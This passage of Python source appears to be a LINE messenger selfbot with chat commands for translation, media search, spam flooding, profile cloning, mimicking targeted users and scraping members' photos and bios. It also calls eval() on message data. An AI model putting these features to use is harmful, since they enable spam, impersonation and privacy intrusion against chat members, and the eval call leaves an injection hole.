msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif msg.text in ["เปิดอ่าน","R on","ตั้งเวลา"]:
cl.sendText(msg.to,"lurk on")
elif msg.text in ["ปิดอ่าน","R off"]:
cl.sendText(msg.to,"lurk off")
elif msg.text in ["ใครอ่าน","Ry"]:
cl.sendText(msg.to,"lurkers")
elif msg.text in ["Ry20"]:
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"llurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist","Heckmic"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "• "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Phetmic " in msg.text:
cmd = msg.text.replace("Phetmic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
cl.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
cl.sendImageWithUrl(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
cl.sendVideoWithUrl(msg.to,wait["pap"])
#==============================================================================#
elif msg.text in ["Sk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki1.sendMessage(msg)
elif msg.text.lower() == 'mymid':
cl.sendText(msg.to,mid)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string + "")
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string)
elif msg.text in ["Myname","Mename"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["ตัส","Mey1"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["รูป","Mey2"]:
h = cl.getContact(mid)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["โปรวีดีโอ","Mey3"]:
h = cl.getContact(mid)
cl.sendVideoWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["ลิ้งรูป","Mey4"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["ปก","Mey5"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
elif msg.text in ["ลิ้งปก","Mey6"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif "#22Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Ph4" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Ph2" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "mh2" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#ดึงรูป" in msg.text:
nk0 = msg.text.replace("#ดึงรูป","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "#pictall" in msg.text:
nk0 = msg.text.replace("#pictall","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "เชคหมด" in msg.text:
nk0 = msg.text.replace("เชคหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "Ph3vdo @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Ph3vdo @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendVideoWithUrl(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Ph3url @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Ph3url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "2url @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("2url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Ph2url @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Ph2url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "เจ้งเตือน" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithUrl(msg.to,path)
elif "แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybb"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
#==========================================================#
elif "[Auto Respond]" in msg.text:
cl.sendImageWithUrl(msg.to, "http://dl.profile.line.naver.jp/0hlGvN3GXvM2hLNx8goPtMP3dyPQU8GSIgJVUpCTpiPVtiA3M2clJ-C2hia11mUn04cAJ-DWljOVBj")
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx: " in msg.text:
txt = msg.text.replace("Tx: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Bx: " in msg.text:
txt = msg.text.replace("Bx: ", "")
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx10: " in msg.text:
txt = msg.text.replace("Tx10: ", "")
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO ENGLISH----\n" + "" + result + "\n------SUKSES-----")
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM EN----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Jp@id" in msg.text:
bahasa_awal = 'ja'
bahasa_tujuan = 'id'
kata = msg.text.replace("Jp@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@th ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Th@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ar'
kata = msg.text.replace("Id@ar ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
bahasa_awal = 'ar'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ar@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ko'
kata = msg.text.replace("Id@ko ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
bahasa_awal = 'ko'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ko@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif msg.text.lower() == 'welcome':
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("ยินดีต้อนรับเข้าสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
tts = gTTS(text=jawaban1, lang='th')
tts.save('hasil.mp3')
cl.sendAudioWithUrl(msg.to,'hasil.mp3')
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudioWithUrl(msg.to,'tts.mp3')
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudioWithUrl(msg.to,'tts.mp3')
elif '#dy ' in msg.text:
try:
textToSearch = (msg.text).replace('#dy ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithUrl(msg.to, ght)
except:
cl.sendText(msg.to,"Could not find it")
elif 'mp4 ' in msg.text:
try:
textToSearch = (msg.text).replace('mp4 ',"").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithUrl(msg.to, ght)
except:
cl.sendText(msg.to, "Could not find it")
elif "Lirik " in msg.text:
try:
songname = msg.text.lower().replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif "/vk " in msg.text:
try:
wiki = msg.text.lower().replace("/vk ","")
wikipedia.set_lang("th")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Music " in msg.text:
try:
songname = msg.text.lower().replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithUrl(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif "#Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#ค้นหารูปภาพ:" in msg.text:
search = msg.text.replace("ค้นหารูปภาพ:","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#Profileig " in msg.text:
try:
instagram = msg.text.replace("#Profileig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
